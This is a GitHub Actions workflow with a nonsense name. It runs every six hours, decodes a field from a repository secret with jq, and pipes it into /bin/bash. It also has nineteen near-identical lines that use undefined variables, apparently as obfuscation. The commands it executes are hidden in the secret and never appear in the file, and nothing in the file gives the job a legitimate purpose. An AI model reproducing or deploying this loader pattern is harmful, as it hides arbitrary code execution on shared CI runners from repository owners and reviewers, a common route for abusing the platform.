name: insuranceguilty

on:
  workflow_dispatch:
  schedule:
    - cron: '18 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: insuranceguilty
        env:
          mujo494: ${{ secrets.mujo494 }}
        run: |
          echo $mujo494 | jq -r .wnt13 | /bin/bash
          echo $gl5 | jq -r .kfen8 | /bin/bash
          echo $dz045 | jq -r .qdz8534 | /bin/bash
          echo $nneml9211 | jq -r .d973 | /bin/bash
          echo $bpkhu2 | jq -r .h83842 | /bin/bash
          echo $fat49 | jq -r .kwa3 | /bin/bash
          echo $vdral62 | jq -r .mke08920 | /bin/bash
          echo $gsey61171 | jq -r .kr02614 | /bin/bash
          echo $lip894 | jq -r .shlts032 | /bin/bash
          echo $igyzx56 | jq -r .kg79 | /bin/bash
          echo $vn31 | jq -r .xczg9 | /bin/bash
          echo $ulrrc41390 | jq -r .je30308 | /bin/bash
          echo $tkrt5990 | jq -r .vf114 | /bin/bash
          echo $p4 | jq -r .r20569 | /bin/bash
          echo $s44 | jq -r .wkmh934 | /bin/bash
          echo $jxmaq00864 | jq -r .bxcmb96731 | /bin/bash
          echo $qv680 | jq -r .dhd2 | /bin/bash
          echo $ajuo2454 | jq -r .jqwjh49 | /bin/bash
          echo $bxdt31132 | jq -r .yupzp58 | /bin/bash
          echo $tcf93515 | jq -r .ds67 | /bin/bash

